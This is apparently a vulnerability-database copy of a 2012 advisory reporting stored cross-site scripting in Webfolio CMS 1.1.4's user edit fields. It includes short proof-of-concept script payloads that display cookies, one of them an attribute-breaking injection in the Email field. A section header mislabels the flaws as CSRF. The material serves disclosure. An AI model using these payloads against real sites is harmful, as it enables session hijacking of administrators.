Lucene search
K

Webfolio CMS 1.1.4 Cross Site Scripting

🗓️ 07 Mar 2012 00:00:00Reported by Ivano BinettiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

Webfolio CMS 1.1.4 has multiple XSS vulnerabilities due to improper input sanitization in fields.

Code
`+--------------------------------------------------------------------------------------------------------------------------------+  
# Exploit Title : WebfolioCMS <= 1.1.4 Multiple XSS   
# Date : 07-03-2012  
# Author : Ivano Binetti (http://www.ivanobinetti.com)  
# Software link : http://sourceforge.net/projects/webfolio-cms/files/WebfolioCMS-1.1.4.zip/download  
# Vendor site : http://webfolio-cms.sourceforge.net/  
# Version : 1.1.4 and lower   
# Tested on : Debian Squeeze (6.0)   
# Original Advisory: http://ivanobinetti.blogspot.com/2012/03/webfolio-114-multiple-xss.html  
+--------------------------------------------------------------------------------------------------------------------------------+  
+------------------------------------------[CSRF Vulnerabilities by Ivano Binetti]-----------------------------------------------+  
  
Summary  
1)Introduction  
2)Vulnerabilities Description  
3)POC  
  
+--------------------------------------------------------------------------------------------------------------------------------+  
1)Introduction  
Webfolio CMS "is a free, open-source, customized content management system, whose main purpose is creation of web sites for   
presenting someone's work, and portfolio-like websites".  
  
2)Vulnerabilities Description  
WebfolioCMS 1.1.4 (and lower) is prone to multiple XSS vulnerabilities in "webfolio/admin/users/edit/<used_id>" pages   
- where <used_id> = 1....n - due to an improper input sanitization.  
  
3)POC  
To exploit "First name" and "Last name" fields:   
<script>alert(document.cookie)</script>   
  
To exploit "Email (required)" field:   
[email protected]"><script>alert(document.cookie)</script>   
  
+--------------------------------------------------------------------------------------------------------------------------------+  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation